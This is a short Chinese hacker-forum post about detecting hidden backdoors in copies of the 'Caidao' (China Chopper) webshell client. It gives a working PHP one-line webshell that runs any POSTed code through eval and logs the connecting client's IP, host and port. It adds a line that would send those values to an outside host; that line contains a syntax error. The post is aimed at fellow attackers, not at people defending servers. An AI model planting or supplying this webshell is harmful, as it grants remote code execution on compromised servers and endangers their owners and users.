关于菜刀后门排查
最近菜刀后门被爆出来后 大家都在寻找没有后门的菜刀
可是…
人家说没后门 你却不知道是否真的没有后门(除非自己抓下包或者反编译看看)
自己先初步排查 如抓包:
http://www.myhack58.com/Article/html/3/8/2015/66935.htm
习科 虾米大牛的
http://tieba.baidu.com/p/3187132003
去年的时候菜刀后门事件被爆 可没有现在那么火热
我也在挺早的时间查了一下自己的菜刀 确实有发现请求,不过现在去掉了
可是… 记得前段时间看到一篇文章 连上菜刀不发包 但是你做操作的时候才发包 这个也有遇到过..
于是… 还是被爆菊
我和大家分享一下我是如何发现菜刀是否存在后门的
我稍微修改了一句话木马 从而使他连接会记录连接者的IP
代码:
<?php
header("Content-type:text/html;charset=utf-8");
if(!empty($_POST['t'])){
$t = fopen("1.txt","a+");
fwrite($t,"Hakcer IP: ".@$_SERVER['REMOTE_ADDR']." Hacker Name: ".@$_SERVER['REMOTE_HOST']." Hacker Prot: ".@$_SERVER['REMOTE_PORT']."\r\n");
eval($_POST['t']);
}
?>
1.txt 是在马的目录下的 各位可自行修改为远程发送
file_get_contents("http://www.t0n9.com/1.php?i=".@$_SERVER['REMOTE_ADDR']."&n=".@$_SERVER['REMOTE_HOST']."&p="@$_SERVER['REMOTE_PORT']);
这个有点守株待兔的感觉
抛砖引玉,希望各位共享一下自己排查后门的方法与姿势!